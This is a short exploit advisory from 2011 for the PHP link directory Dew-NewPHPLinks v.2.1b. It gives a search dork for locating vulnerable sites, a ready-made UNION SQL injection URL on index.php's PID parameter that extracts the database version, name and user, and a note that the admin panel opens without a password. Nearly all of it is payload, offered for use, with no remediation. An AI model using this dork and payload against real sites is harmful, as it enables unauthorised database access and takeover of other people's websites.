ExploitFixes
Dew-NewPHPLinks v.2.1b (index.php) SQL Injection Vulnerability 2011-02-06 09:15:15

Dew-NewPHPLinks v.2.1b (index.php) Sql Injection Vulnerability
======================================================================

######################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://www.dew-code.com/
.:. Dork : "Powered By Dew-NewPHPLinks v.2.1b"
.:. Special Gr34T$ T0 ZaIdOoHxHaCkEr

######################################################################

===[ Exploit ]===
First:
=======
www.site.com/index.php?PID=9999[Sql Injection]

www.site.com/index.php?PID=9999+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user()),2

Second:
=======
Bypass join Control Admin
Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password

######################################################################

txt